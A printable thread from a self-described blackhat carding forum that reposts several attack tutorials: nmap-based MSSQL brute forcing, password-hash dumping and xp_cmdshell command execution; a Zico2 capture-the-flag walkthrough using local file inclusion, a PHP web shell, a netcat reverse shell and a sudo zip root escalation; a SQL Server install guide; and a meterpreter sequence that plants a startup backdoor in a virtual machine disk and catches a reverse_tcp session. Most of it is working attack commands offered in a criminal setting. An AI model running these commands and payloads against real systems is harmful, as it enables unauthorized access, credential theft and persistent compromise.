Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to MSSQL Peneration Testing using Nmap - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to MSSQL Peneration Testing using Nmap (/Thread-Guide-How-to-MSSQL-Peneration-Testing-using-Nmap)

[Guide] How to MSSQL Peneration Testing using Nmap - NINZA - 05-14-2020

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article, we had set up Microsoft SQL server in Windows 10.
Requirement
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Let’s start!!
Scan port 1433
Open the terminal in Kali Linux and scan target IP for port 1433 using nmap command.
nmap -p 1433 192.168.1.104
1
nmap -p 1433 192.168.1.104
From given below image you can observe that port 1433 is open for MS-SQL service.
[Image: 1.png?w=687&ssl=1]
Enumerating version information
Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.
nmap -p 1433 --script ms-sql-info 192.168.1.104
1
nmap -p 1433 --script ms-sql-info 192.168.1.104
In specified below image you can observe the install version and details of MS-SQL server.
[Image: 2.png?w=687&ssl=1]
Brute Force Attacker
Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104
1
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104
In the specified image you can observe that we had successfully retrieve credential for two users:
  • Username: ignite and password:12345
  • Username: sa and password:admin123
[Image: 3.png?w=687&ssl=1]
Execute MS-SQL Query
Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.
Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.
nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104
1
nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104
Hence as result, it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.
[Image: 4.png?w=687&ssl=1]
Check Microsoft SQL server configuration
The following command will attempt to describe the Microsoft SQL server configuration setting by passing login credential as an argument through nmap script.
nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
1
nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
Hence you can check configuration setting from given below image.
[Image: 5.png?w=687&ssl=1]
Obtain a list of tables
The following command will attempt to fetch a list of tables from inside Microsoft SQL server by passing login credential as an argument through nmap script.
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
1
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
Hence you can checklist of tables from given below image.
[Image: 6.png?w=687&ssl=1]
Enumerate NetBIOS information
Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.
nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104
1
nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104
Hence from given below image, you can read the NetBIOS information remote Microsoft SQL server.
[Image: 7.png?w=687&ssl=1]
Dump password hashes
The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so, the user needs to have the appropriate DB privileges.
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
1
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
From the given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.
[Image: 8.png?w=687&ssl=1]
Identify the database owner
Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so, the user needs to have the appropriate DB privileges. Therefore we have passes username and password as an argument through NMAP script.
nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
1
nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
In the specified image you can observe that it showing user sa is owner the database “ignite”.
[Image: 9.png?w=687&ssl=1]
Ms-SQL Allows XP_cmdshell option
The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled.
From given below image you can see we had enabled the xp_cmdshell function by executing the following statement inside the master database.
EXEC sp_configure ‘xp_cmdshell’;
[Image: 11.png?w=687&ssl=1]
Now save the above configuration setting through the following statement:
RECONFIGURE;
[Image: 12.png?w=687&ssl=1]
Exploit XP_cmdshell Function
Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-sql-xp-cmdshell.cmd="net user " 192.168.1.104
1
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-sql-xp-cmdshell.cmd="net user " 192.168.1.104
From the given image you can confirm that we have executed OS command: net user as retrieving user account.
[Image: 13.png?w=687&ssl=1]
Blank password lead to unauthorized access
If the admin of Microsoft-SQL Server left the password Blank for login then the attacker can director login into the database server, from given below image you can see we are exploring the property of a user’s account “sa”.
[Image: 14.png?w=687&ssl=1]
Here kept “blank space” as the password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space, therefore, chances of making unauthorized access into the server by the attacker will get increases.
[Image: 15.png?w=687&ssl=1]
Make unauthorized access into SQL server
Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
nmap -p 1433 --script ms-sql-empty-password 192.168.1.104
1
nmap -p 1433 --script ms-sql-empty-password 192.168.1.104
From given below image you can perceive we had made successfully login with user: sa and an empty password.
[Image: 17.png?w=687&ssl=1]

Today we are going to take another boot2root challenge known as Zico2 By “Rafael”, where we have to root the system to complete the challenge.
Download this VM here:

[To see content please register here]


Difficulty Level: Intermediate
Penetration Methodologies
Scanning
  • Netdiscover
  • Nmap
Enumeration
  • HTTP surfing
  • Directory enumeration
Exploiting
  • LFI
  • Obtaining reverse shell via netcat
Privilege Escalation
  • Login through SSH
  • Identify user’s credential
  • Abusing SUID binaries
Capture the flag
Walkthrough
Scanning
Let’s start off with finding IP using netdiscover and in this case, our IP is 192.168.1.108.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]
Time to scan the Target’s IP with Nmap. The scan result shows port 22(ssh), port 111(rpcbind) and port  80 are open.
nmap -A 192.168.1.108
1
nmap -A 192.168.1.108
[Image: 2.png?w=687&ssl=1]
Enumeration
Since port 80 is running HTTP, so our obvious choice is to browse Target’s IP in the browser.
[Image: 3.png?w=687&ssl=1]                                         
We scroll through the page and click on “check them out” as can be seen in the following screenshot.
[Image: 4.png?w=687&ssl=1]
After clicking on the previous page it takes us here and where we notice the URL which was looking for tools.html page and thus it could be vulnerable to LFI, let’s verify it.
[Image: 5.png?w=687&ssl=1]
Here I tried to get LFI and succeeded with “/../../etc/passwd”. Now as we can read the content of passwd file we find a user ‘zico’ in there. Let’s just save this info for now.
[Image: 6.png?w=687&ssl=1]
While enumerating directories through dirb, found an interesting directory “/dbadmin”.
dirb

[To see content please register here]


1
dirb

[To see content please register here]


[Image: 7.png?w=687&ssl=1]
When we browse ‘/dbadmin’ directory, it displays a file named “test_db.php”.
[Image: 8.png?w=687&ssl=1]
Here, we can see a php database login page along with version name, so we can google things up or if we go by the name of “test_db” it hints at a default setup.
So tried ‘admin’ as password and it worked.
[Image: 9.png?w=687&ssl=1]
Exploiting
Next, we are using ‘Searchsploit’ and as the name indicates, it will search for all exploits and shellcodes for phpliteadmin(in this case). In the screenshot we can see that it is vulnerable to Remote php code execution and EDB-ID for the same is ‘24044’. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines to exploit the db.
searchsploit phpliteadmin
searchsploit -m 24044
cat 24044.txt
1
2
3
searchsploit phpliteadmin
searchsploit -m 24044
cat 24044.txt
[Image: 10.png?w=687&ssl=1]
Here we have followed the guidelines :
Step1: Created a database and named it ‘shell.php’ (we had to add the extension ‘.php’ with the database name)
[Image: 11.png?w=687&ssl=1]
Step 2: Created a table ‘shell’. Inside the table, we created a column ‘field’, selected the type of the column to be an ‘Integer’ and set the default value to “<?php echo system($_GET[“cmd”]); ?>”.
[Image: 13.png?w=687&ssl=1]
From the following screenshot, it can be seen that our php code script has been saved in the database.
[Image: 14.png?w=687&ssl=1]
Now we just have to run the file (the full path of the created php file is exposed)
So, to execute the file we can use the previously detected LFI vulnerability. And we have got lucky as we are inside ‘www-data’ .

[To see content please register here]


1

[To see content please register here]


[Image: 15.png?w=687&ssl=1]
Time to set up a netcat listener in our local machine and run the python code inside the uploaded shell to get a reverse shell. (refer next screenshot for the listener)
Python code reference:

[To see content please register here]


[To see content please register here]

= python shell
1

[To see content please register here]

= python shell
[Image: 16.png?w=687&ssl=1]
To simulate a proper shell with TTY we use python one-liner. Once at the shell, we find ‘wp-config.php’ file inside “/home/zico/wordpress”.
nc -lvp 1234
python -c 'import pty;pty.spawn("bin/bash")'
ls
cd /home
ls
cd zico
ls
cd wordpress
ls
1
2
3
4
5
6
7
8
9
nc -lvp 1234
python -c 'import pty;pty.spawn("bin/bash")'
ls
cd /home
ls
cd zico
ls
cd wordpress
ls
[Image: 17.png?w=687&ssl=1]
Inside the wp-config.php file, we discover a database user zico and its password. 
cat wp-config.php
1
cat wp-config.php
[Image: 18.png?w=687&ssl=1]
Privilege Escalation
We use recently discovered credentials to login through ssh.
Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run both tar and zip commands as root without the need to enter any password.
So, now in the process of escalating the privileges from “zico” to “root”. At first, we create a file ‘raj’ than we perform three different tasks in a single line of code: first, we zip the file ‘raj’ second move it to /tmp/nisha.zip folder and lastly unzip it which will pop the root shell.
Finally, we get ‘flag.txt’ inside the root directory. Hence, we accomplished the task.
ssh [email protected]
sudo -l
touch raj
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
cd /root
ls
cat flag.txt
1
2
3
4
5
6
7
ssh [email protected]
sudo -l
touch raj
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
cd /root
ls
cat flag.txt
[Image: 19.png?w=687&ssl=1]
Here is the complete reference to exploit sudo rights:

[To see content please register here]



Today you will learn how to install and configure MS SQL server in Windows 10 operating system.
Requirement:
  1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe
  2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from

    [To see content please register here]


  3. Download

    [To see content please register here]

    tool
Configure SQL express setup
Open the 1st download file for SQL server installation and run as administrator. Click on installation then go with New SQL server standalone installation.
[Image: 1.png?w=687&ssl=1]
To install sql server2012 follow given below three steps:
  • License terms
  • Product updates
  • Install setup files
Here enable the check box for “I accept the license terms” and click on next.
[Image: 2.png?w=687&ssl=1]
Enable the check box for “Include SQL server product updates” to enhance the SQL server security and performance. It found 26 MB setup online which will get installed when you will click on next.
[Image: 3.png?w=687&ssl=1]
Now it will start installing SQL server setup file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.
[Image: 4.png?w=687&ssl=1]
Feature Selection
Now select the features you want to install from the given image you can see I had enabled check box for following features.
  • Database Engine service
  • SQL Server Replication
  • SQL Client Connective SDK
Click on next.
[Image: 5.png?w=687&ssl=1]
Instance Configuration
Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of the installation path.
  • Enter SQLExpress in the text filed for Name Instance
  • Enter SQLExpress in the text filed for Instance ID
After then click on next
You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.
[Image: 6.png?w=687&ssl=1]
Database Engine Configuration
Specify Database Engine authentication for its security mode 
By default, sa is the administrator of MS SQL
Under the panel of authentication mode:
  • Click on mixed mode which is a combination of both type authentication SQL server and Windows.
  • Type your password and confirm the password for administrator account.
From the given image you can observe that selected user will be part of administrator account of SQL server who has the unrestricted access over database engine.
After then click on next and next.
[Image: 7.png?w=687&ssl=1]
Your SQL server 2012 installation completed successfully, here you can check the status for installed features.
[Image: 9.png?w=687&ssl=1]
Now open the SQL server configuration manager where you will see left and right panel.
Click on the protocol for SQLExpress in the left panel and then after select protocol name “TCP/IP” in the right panel.
[Image: 10.png?w=687&ssl=1]
Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.
[Image: 12.png?w=687&ssl=1]
Configure SQL Management Studio setup
Now open 2nd downloaded application for SQL server management setup and add a new feature in it.
[Image: 13.png?w=687&ssl=1]
No updates for SQL server 2012 click on next.
[Image: 14.png?w=687&ssl=1]
Installation type
Since we have already created instance “SQLExpress” now we can add featured in SQLExpress instance of SQL server 2012.
From given below image you can observe the table for installed instance. Click on next
[Image: 15.png?w=687&ssl=1]
Feature selection
For installation of the instance, the feature enables the checkbox for Management tool basic as shared featured then click on next and next.
[Image: 16.png?w=687&ssl=1]
Management tool basic installation completed successfully, here you can check the status for installed features. Click on installation then go with New SQL server standalone installation.
[Image: 18.png?w=687&ssl=1]
Now login into SQL Server using admin credential and click on connect.
[Image: 19.png?w=687&ssl=1]
Once you are login into SQL server then Explore security folder and create a new login account for other users.
[Image: 20.png?w=687&ssl=1]
Enter the user name as I had given “ignite” and set a password by choosing SQL server authentication for this user.
From the given image you can observe that master is the default database.
[Image: 21.png?w=687&ssl=1]
Connect to server
Run heidisql tool to connect with MS SQL Server through Ignite user as given below:
Network type: TCP/IP
Hostname /IP: 192.168.1.104
User: ignite
Password: 123456
Port: 1433
1
2
3
4
Hostname /IP: 192.168.1.104
User: ignite
Password: 123456
Port: 1433
HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, Microsoft SQL databases, and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers, and scheduled events.
Now click on open
[Image: 22.png?w=687&ssl=1]
Great!! We have successfully access the database system of the MSSQL server. You can modify or create a new table or new database and much more things.
[Image: 23.png?w=687&ssl=1]

Today you will learn How to exploit any Operation System running inside a virtual machine.
Requirements
  • Attacker: Kali Linux
  • Target: VM image windows server 2012
First, the attacker needs to exploit the actual operating system of the victim PC and attain the meterpreter session with admin privileges.
From the given image you can perceive I have seized a windows 10 meterpreter session and also gained its admin privileges.
meterpreter > sysinfo
1
meterpreter > sysinfo
[Image: 1.png?w=687&ssl=1]
When you install any operating system in your VMware workstation, all of its hardware and network setting get stored as a .vmx file in the actual operating system in order to create a new virtual image.
Type following for making the search of .vmx file stored in it
meterpreter > search –f *.vmx –r
1
meterpreter > search –f *.vmx –r
From the given image you can perceive that it has dumped all location where .vmx files are stored.
[Image: 2.png?w=687&ssl=1]
Using cat command you can read the content of the file as these file simple text document which contains VMware setting information.
meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
1
meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
[Image: 3.png?w=687&ssl=1]
Here from given below image, you can read the details of this file which is describing network and hardware setting.
[Image: 4.png?w=687&ssl=1]
This module mounts a .vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.
use post/windows/manage/vmdk_mount
msf post(vmdk_mount) > set DEL_LCK true
msf post(vmdk_mount) > set READ_MODE false
msf post(vmdk_mount) > set session 2
msf post(vmdk_mount) > set VMDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
msf post(vmdk_mount) > run
1
2
3
4
5
6
use post/windows/manage/vmdk_mount
msf post(vmdk_mount) > set DEL_LCK true
msf post(vmdk_mount) > set READ_MODE false
msf post(vmdk_mount) > set session 2
msf post(vmdk_mount) > set VMDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
msf post(vmdk_mount) > run
Great!! We have successfully mount the vmdk file of Windows Server 2012.
[Image: 5.png?w=687&ssl=1]
meterpreter > show_mount
1
meterpreter > show_mount
Now from given below image, you can read the information of each drive.
[Image: 6.png?w=687&ssl=1]
Now using given below command I will upload an exe backdoor in L: drive which will give us reverse connection of windows server 2012 when it will be running inside VM workstation.
meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"
1
meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"
[Image: 7.png?w=687&ssl=1]
use exploit/multi/handler
msf exploit(handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >set lhost 192.168.1.113
msf exploit(handler) >set lport 4455
msf exploit(handler) >run
1
2
3
4
5
use exploit/multi/handler
msf exploit(handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >set lhost 192.168.1.113
msf exploit(handler) >set lport 4455
msf exploit(handler) >run
Awesome!! We have successfully exploited Windows Server 2012 virtual machine and gained its meterpreter session.
meterpreter > sysinfo
1
meterpreter > sysinfo
[Image: 8.png?w=687&ssl=1]
Source:

[To see content please register here]